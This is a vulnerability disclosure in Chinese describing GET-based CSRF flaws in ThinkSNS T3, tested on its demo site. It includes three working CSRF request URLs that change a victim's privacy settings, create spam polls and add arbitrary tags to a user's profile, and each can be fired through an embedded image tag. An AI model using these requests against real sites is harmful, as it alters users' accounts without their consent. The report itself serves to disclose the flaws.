### 简要描述:
ThinkSNS多处CSRF(GET型),可造成一定危害
### 详细说明:
就拿你们的演示站点做了测试(是T3的最新版本)
```
http://demo.thinksns.com/
```
------
ThinkSNS最新版本内对于POST请求的来源是进行了判断的
[<img src="https://images.seebug.org/upload/201402/07112637efc5a30793c4f4804c5cb52845325747.png" alt="0.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/07112637efc5a30793c4f4804c5cb52845325747.png)
但是ThinkSNS最新版本对于POST和GET请求是不分的,而且GET请求的是可以在网站内用<img>标签发起的,将导致严重的安全问题,我就选取了一些发上来。
### 漏洞证明:
1)更改个人设置中的隐私设置(通过GET请求实现)
```
http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSavePrivacy&comment_weibo=1&message=1&space=1
```
[<img src="https://images.seebug.org/upload/201402/07113025d9dce38059dcd3743586e6f6523a122c.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/07113025d9dce38059dcd3743586e6f6523a122c.png)
2)发起大量垃圾投票(可刷分/通过GET请求实现):
```
http://demo.thinksns.com/t3/index.php?app=vote&mod=Index&act=add&date=7&opt%5B%5D=%E4%BD%A0%E5%B8%85&opt%5B%5D=%E6%88%91%E5%B8%85&title=%E7%8E%A9%E7%8E%A9&type=0
```
[<img src="https://images.seebug.org/upload/201402/07113445e823baf7319c9aaa9a9804c116c3e8ab.png" alt="CSRF.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/07113445e823baf7319c9aaa9a9804c116c3e8ab.png)
3)可给任何用户加“傻X”(任意)标签,请求如下(通过GET请求实现)
```
http://demo.thinksns.com/t3/index.php?app=public&mod=Account&act=doSaveProfile&tag_num=5&user_tags=785
```
[<img src="https://images.seebug.org/upload/201402/07112902b7d750c619242911d573afdb10a41d42.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201402/07112902b7d750c619242911d573afdb10a41d42.png)
暂无评论